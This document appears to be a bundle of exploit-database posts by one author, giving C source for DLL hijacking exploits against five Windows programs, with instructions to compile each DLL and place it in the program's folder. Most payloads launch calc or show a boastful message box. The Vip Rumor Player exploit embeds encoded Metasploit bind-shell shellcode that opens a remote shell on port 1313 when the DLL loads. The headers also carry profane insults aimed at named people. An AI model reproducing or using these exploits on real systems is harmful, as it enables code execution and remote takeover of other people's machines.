SmartFTP version 4.0.1142.0, Speak Aloud, The GodFather version 0.80, Vip Rumor Player version 3.7 and Wise Registry Cleaner DLL hijacking exploit.
0a8c2d9a9b6b25e76828d4528d063bf6d6e6d75f8d9314b1a6682e9bf35411b7
===================================================
SmartFTP 4.0.1142.0 DLL Hijacking Exploit
===================================================
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################### 1
0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
/*
#SmartFTP 4.0.1142.0 DLL Hijacking Exploit (dwmapi.dll ; propsys.dll )
#Author : anT!-Tr0J4n
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends
#Software: http://www.smartftp.com
#Version : 4.0.11402.0
#Tested on: Windows XP sp3
# Home : www.Dev-PoinT.com : http://inj3ct0r.com
------------------------------
Fuck LAMERZ : X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada -- > fuck kids
------------------------------
[+] Compile code as dwmapi.dll ; propsys.dll
[+] Move DLL file to the directory where SmartFTP 4.0.1142.0 is installed
[+] check the result --> Your System 0wn3d BY anT!-Tr0J4n
=====================
#dwmapi.dll (code)
*/
#include <windows.h>
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void DwmDefWindowProc() { evil(); }
DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); }
DLLIMPORT void DwmEnableComposition() { evil(); }
DLLIMPORT void DwmEnableMMCSS() { evil(); }
DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); }
DLLIMPORT void DwmGetColorizationColor() { evil(); }
DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); }
DLLIMPORT void DwmGetWindowAttribute() { evil(); }
DLLIMPORT void DwmIsCompositionEnabled() { evil(); }
DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); }
DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); }
DLLIMPORT void DwmRegisterThumbnail() { evil(); }
DLLIMPORT void DwmSetDxFrameDuration() { evil(); }
DLLIMPORT void DwmSetPresentParameters() { evil(); }
DLLIMPORT void DwmSetWindowAttribute() { evil(); }
DLLIMPORT void DwmUnregisterThumbnail() { evil(); }
DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}
=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-==-=
#propsys.dll (code)
*/
#include "stdafx.h"
void init() {
MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "Dev-PoinT",0x00000003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
===================================================
Speak Aloud DLL Hijacking Exploit (dwmapi.dll)
===================================================
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################### 1
0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
/*
#Speak Aloud DLL Hijacking Exploit (dwmapi.dll)
#Author : anT!-Tr0J4n
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~all DEV-PoinT t34m ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil
#special thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member
#Home : www.Dev-PoinT.com $ http://inj3ct0r.com
#Software : http://www.guangmingsoft.net/speakaloud/help.htm
#Tested on: Windows XP sp3
------------------------------
Fuck LAMERZ : X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada -- > fuck kids
------------------------------
[+] Compile code as dwmapi.dll
[+] Move DLL file to the directory where Speak Aloud Editor is installed
[+] check the result --> 0wn33d
==========================
# dwmapi.dll(code)
*/
#include <windows.h>
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void DwmDefWindowProc() { evil(); }
DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); }
DLLIMPORT void DwmEnableComposition() { evil(); }
DLLIMPORT void DwmEnableMMCSS() { evil(); }
DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); }
DLLIMPORT void DwmGetColorizationColor() { evil(); }
DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); }
DLLIMPORT void DwmGetWindowAttribute() { evil(); }
DLLIMPORT void DwmIsCompositionEnabled() { evil(); }
DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); }
DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); }
DLLIMPORT void DwmRegisterThumbnail() { evil(); }
DLLIMPORT void DwmSetDxFrameDuration() { evil(); }
DLLIMPORT void DwmSetPresentParameters() { evil(); }
DLLIMPORT void DwmSetWindowAttribute() { evil(); }
DLLIMPORT void DwmUnregisterThumbnail() { evil(); }
DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}
===================================================
The GodFather v 0.80 DLL Hijacking Exploit
===================================================
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################### 1
0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
/*
#The GodFather v 0.80 DLL Hijacking Exploit( fwpuclnt.dll ; wnaspi32.dll )
#Author : anT!-Tr0J4n
#Email : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~ All Dev-poinT members and my friends
#special thanks to : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member
#Home : www.Dev-PoinT.com $ http://inj3ct0r.com
#Software : http://www.jtclipper.eu/
#Version : 1.5.7
#Tested on: Windows XP/Vista/Windows 7
------------------------------
Fuck LAMERZ : X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada -- > fuck kids
------------------------------
[>>] Compile code as fwpuclnt.dll ; wnaspi32.dll
[>>] Move DLL file to the directory where The GodFather is installed
[>>] check the result =--> [ Your System 0wn3d BY anT!-Tr0J4n ]
=-=-=-=-=-=-=-=-==-=-==-=-=-=-=-=
[ + ] fwpuclnt.dll
[ + ] wnaspi32.dll
(code)
*/
#include "stdafx.h"
void init() {
MessageBox(NULL,"Your System 0wn3d BY anT!-Tr0J4n", "inj3ct0r",0x00000003);
}
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch (ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:
init();break;
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
case DLL_PROCESS_DETACH:
break;
}
return TRUE;
}
===================================================
Vip Rumor Player 3.7 DLL Hijacking Exploit
===================================================
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################### 1
0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
/*
#Vip Rumor Player 3.7 DLL Hijacking Exploit (mfc71enu.dll ; mfc71loc.dll )
#Author : anT!-Tr0J4n
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~all DEV-PoinT t34m ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil
#special thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member
#Home : www.Dev-PoinT.com $ http://inj3ct0r.com
#Product Version : 3.7
#Vendor : http://www.viprumor.com
#Tested on: Windows XP sp3
------------------------------
Fuck LAMERZ : X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada -- > fuck kids
------------------------------
[>>] Compile code as mfc71enu.dll ; mfc71loc.dll
[>>] Move DLL file to the directory where Vip Rumor Player is installed
[>>] check the result --> 0wn33d
[>>]exploit.acc
[>>]exploit.aif
[>>]exploit.aiff
[>>]exploit.ape
[>>]exploit.flac
[>>]exploit.m4a
[>>]exploit.m4b
[>>]exploit.mp3
[>>]exploit.mpc
[>>]exploit.ogg
[>>]exploit.wav
==========================
*/
#include <windows.h>
#define DllExport __declspec (dllexport)
/*
* windows/shell_bind_tcp - 476 bytes
* http://www.metasploit.com
* Encoder: x86/shikata_ga_nai
* LPORT=1313, RHOST=, EXITFUNC=process, InitialAutoRunScript=,
* AutoRunScript=
*/
unsigned char buf[] =
"\x33\xc9\xb1\x71\xd9\xcc\xd9\x74\x24\xf4\x5a\xb8\x8b\xf0\x6b"
"\x88\x31\x42\x14\x03\x42\x14\x83\xea\x77\x12\x9e\x51\x4b\x0a"
"\x15\x46\xa7\x13\x2e\xc4\x17\x2d\x90\xfa\x5e\x1c\x44\xcc\x17"
"\x46\x1a\xc1\x2b\x7b\x6b\x0b\xc9\xcb\x79\xf3\x02\x70\xa7\x1c"
"\x1a\x18\x5e\xea\x0e\x4c\x26\x6d\x61\x78\x82\x18\x2e\x5c\xb0"
"\x47\x78\xb2\xc4\x13\xa2\x2b\xfa\x10\xe4\x75\x67\xb5\x3c\x0f"
"\xd8\xbc\xef\xae\xdd\xf7\x7c\x02\x82\xd9\x94\x69\xf6\x52\x08"
"\xc3\xdd\x4d\x9f\x38\x1f\x4c\x58\x59\x99\x20\xce\x33\x2b\xe6"
"\x9e\x58\x2a\x15\x3a\xe7\xac\x30\x0f\xd9\x19\xf0\xbc\x96\xe1"
"\xc5\xdc\xfc\xe7\x42\x6e\x35\x16\x4a\xf8\x16\x82\x92\x75\xcd"
"\x72\xb0\x29\x9e\xe4\xad\xa0\x37\x18\x21\xf9\x5a\x28\xca\xc7"
"\x9e\xa3\x1d\xd5\xe7\xbe\xce\xb6\x58\x9a\x29\xdc\x1a\xba\x13"
"\x72\x13\x09\x87\x4c\x1c\xf4\x9a\x33\x30\x57\x38\x59\x4f\x63"
"\x4a\x8f\xdf\x2b\xc7\x3b\x4a\x2d\x22\x97\x08\x8d\xf0\x36\x57"
"\x04\x14\x71\x65\x45\x49\xf3\x0c\x20\xae\x9d\xef\xc1\xec\xe7"
"\xcb\x29\x4f\x12\x65\x23\x10\xb5\xbc\x8d\xa0\xaf\xc8\x72\x85"
"\x6c\x72\x2e\xe8\x22\x8f\x3b\x16\x40\x86\x68\x80\x7d\xaf\xf4"
"\xd1\xcd\xf6\x7e\xd5\x29\x45\xdb\x05\x92\x29\xc8\xe2\xb4\x13"
"\xfb\xeb\x3b\x9e\x9c\xfe\x62\xac\x9d\xa1\x5c\x9b\x40\x3f\x12"
"\xc6\x92\xf6\x5c\x16\xdb\x64\x62\xcd\x20\x58\x5f\x69\x71\x80"
"\x11\xa4\xde\x36\xf3\x73\x53\x86\x07\xba\x93\x68\x03\x99\xaf"
"\xf7\xd5\x91\x1f\xcb\xc3\x0e\x66\x94\xdc\x5a\x69\x57\xe3\x76"
"\x21\x98\x42\x03\x51\x0e\x59\x36\x6f\x8d\xca\x74\xfa\x6e\x45"
"\x1d\x97\x67\x4b\x6f\xc2\xa6\xeb\xe2\x6d\xc0\x1a\xe7\xae\x0b"
"\x40\xc5\xbe\x68\x96\xbb\x8e\xe3\x0f\x6e\xb4\x4e\x25\x14\xe0"
"\xd0\xa4\x5e\x63\xea\xb6\xec\x72\x47\xbb\xf2\x2d\x24\xce\xa1"
"\x5d\x4f\x3b\x15\xf7\x43\x09\x8d\x49\x29\xa6\x4e\xf2\x38\xcc"
"\x9c\x3f\x40\x37\x0d\x9d\xe6\x85\x77\xb4\x01\xf8\x66\x3f\x0a"
"\x04\x88\x79\x50\xeb\x51\xa7\xf6\x13\x98\x88\xe5\x92\x8b\x5d"
"\xc4\x69\x69\xdb\x3a\x19\x03\xf8\xf5\xde\x75\x17\x75\x1d\xd3"
"\x80\x55\xd3\x72\xcb\xd5\x04\x7c\x2d\xbd\xdd\x09\xee\x44\x57"
"\x5a\x72\x31\xac\xfb\x9b\xf9\x5f\x59\xb0\xfd";
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
int (*func)();
func = (int (*)()) buf;
(int)(*func)();
return 0;
}
===================================================
Wise Registry Cleaner DLL Hijacking Exploit (dwmapi.dll)
===================================================
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : Inj3ct0r.com 0
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
0 0
1 ######################################### 1
0 I'm anT!-Tr0J4n member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
/*
#Wise Registry Cleaner DLL Hijacking Exploit (dwmapi.dll)
#Author : anT!-Tr0J4n
#Greetz : Dev-PoinT.com ~ inj3ct0r.com ~all DEV-PoinT t34m ; GlaDiatOr ;SILVER STAR ; HoBeeZ ; Coffin Of Evil
#special thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 31337 Member
#Home : www.Dev-PoinT.com $ http://inj3ct0r.com
#Software : http://free-registry-cleaner.wisecleaner.com
#Tested on: Windows XP sp3
[+] Wise Registry Cleaner speeds up your PC by cleaning your Registry
------------------------------
Fuck LAMERZ : X-SHADOW ; ThBa7 ; KloofQ8 ; LeGEnD ; abada -- > fuck kids
------------------------------
[+] Compile code as dwmapi.dll
[+] Move DLL file to the directory where Wise Registry Cleaner Editor is installed
[+] check the result --> 0wn33d
==========================
# dwmapi.dll(code)
*/
#include <windows.h>
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void DwmDefWindowProc() { evil(); }
DLLIMPORT void DwmEnableBlurBehindWindow() { evil(); }
DLLIMPORT void DwmEnableComposition() { evil(); }
DLLIMPORT void DwmEnableMMCSS() { evil(); }
DLLIMPORT void DwmExtendFrameIntoClientArea() { evil(); }
DLLIMPORT void DwmGetColorizationColor() { evil(); }
DLLIMPORT void DwmGetCompositionTimingInfo() { evil(); }
DLLIMPORT void DwmGetWindowAttribute() { evil(); }
DLLIMPORT void DwmIsCompositionEnabled() { evil(); }
DLLIMPORT void DwmModifyPreviousDxFrameDuration() { evil(); }
DLLIMPORT void DwmQueryThumbnailSourceSize() { evil(); }
DLLIMPORT void DwmRegisterThumbnail() { evil(); }
DLLIMPORT void DwmSetDxFrameDuration() { evil(); }
DLLIMPORT void DwmSetPresentParameters() { evil(); }
DLLIMPORT void DwmSetWindowAttribute() { evil(); }
DLLIMPORT void DwmUnregisterThumbnail() { evil(); }
DLLIMPORT void DwmUpdateThumbnailProperties() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}